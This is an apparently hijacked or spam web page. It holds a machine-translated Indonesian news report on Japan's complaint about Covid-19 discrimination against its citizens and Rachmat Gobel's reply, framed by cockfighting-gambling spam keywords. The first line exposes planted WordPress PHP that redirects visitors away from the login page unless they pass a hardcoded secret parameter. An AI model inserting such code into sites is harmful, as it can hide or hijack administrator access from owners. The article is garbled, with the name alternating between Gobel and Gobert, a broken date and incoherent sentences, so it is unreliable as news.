//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Gobert mengatakan Jepang mengeluh tentang diskriminasi terhadap warga negara Indonesia, Corona | download game adu ayam_s128live_situs sabung ayam online

Gobert mengatakan Jepang mengeluh tentang diskriminasi terhadap warga negara Indonesia, Corona

Jakarta TRIBUNNEWS.COM-Wakil Ketua Kamar Dagang Industri dan Pembangunan Rachmat Gobel (Rachmat Gobel) menanggapi sikap duta besar Jepang Masatomi Ishii, menuntut agar warga Indonesia yang terkait dengan kasus Covid-19 tidak boleh didiskriminasi. — Rachmat memahami bahwa pemerintah Jepang khawatir tentang hal ini, karena langkah ini tidak hanya membuat warga negara Jepang Indonesia tidak nyaman, tetapi juga gelisah secara psikologis.

Oleh karena itu, dia menanggapi secara positif tanggapan cepat pemerintah Indonesia melalui Donny Gahral Adian, kantor ahli.

Baca: Bogor-Jakarta KRL, yang dikenal sebagai “risiko tinggi coronavirus”, PT KAI: Terjadi di semua wilayah

Baca: Persebaya vs Persipura Liga 1 2020, Aji Santoso Enggan meremehkan hitam Mutiara-Pemerintah mengklaim melalui KSP bahwa tidak ada tindakan diskriminatif karena Jepang adalah negara sahabat dan pergi ke Indonesia untuk memperebutkan mahkota. Diskriminasi tidak dapat dibenarkan, karena Indonesia seharusnya tidak jatuh dalam rasa malu. “Saya percaya pernyataan ini adalah komitmen pemerintah Indonesia, tidak hanya untuk warga negara Jepang, tetapi juga kepada orang-orang Jepang dan warga negara asing lainnya di Indonesia. Saya berharap rencana ini dapat diterapkan secara efektif,” kata Gobert, Rabu (6/6). 11/3) mengatakan dalam pernyataan itu. Dia berharap tidak mengizinkan warga asing untuk bebas berkeliaran, tetapi beberapa warga asing lainnya, seperti Jepang, dibatasi. Dia juga mengatakan bahwa Jepang adalah negara sahabat dan salah satu mitra terbesar Indonesia.

Mitra atau mitra ini mengatakan bahwa Gobel tidak terbatas pada bidang industri, perdagangan, dan layanan, tetapi juga terbatas pada pengembangan dan alih teknologi dan mendukung peningkatan sumber daya manusia. Gobert berkata: “Kami benar-benar harus menanggapi dengan bijaksana dan bijak tanggapan pemerintah Jepang. Agar warga Jepang melakukan bisnis dengan lebih baik, kekhawatiran mereka dapat dipahami.” Dia melanjutkan, “Karena mereka yang melakukan kegiatan. Tentu saja mereka dalam keadaan sehat, dan tentu saja pemerintah telah memberi mereka pengetahuan yang cukup untuk menghindari semua efek korona. “

Karena itu, ia meminta semua pihak untuk waspada dan tidak mendiskriminasi semua warga dunia yang saat ini berada di Indonesia. Apakah mereka warga negara Asia, Eropa, dan Amerika? Dia mengatakan: “Indonesia dan Jepang memiliki kepentingan yang signifikan di berbagai bidang. Mereka juga membantu untuk berurusan dengan warga negara kita yang terkena mahkota Jepang sebelum dievakuasi.” Gobel. Tandaskan bahwa itu dapat dihilangkan sebanyak mungkin. Bahkan prosedur standar untuk menangani kasus korona yang sehat, mencurigakan dan positif dapat dengan cepat diselesaikan melalui sistem kerja yang lengkap. Gobert mengatakan bahwa berita itu disiarkan di KONTAN dengan tajuk utama: Jepang mengeluh tentang diskriminasi Corona terhadap warga negara Indonesia.

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online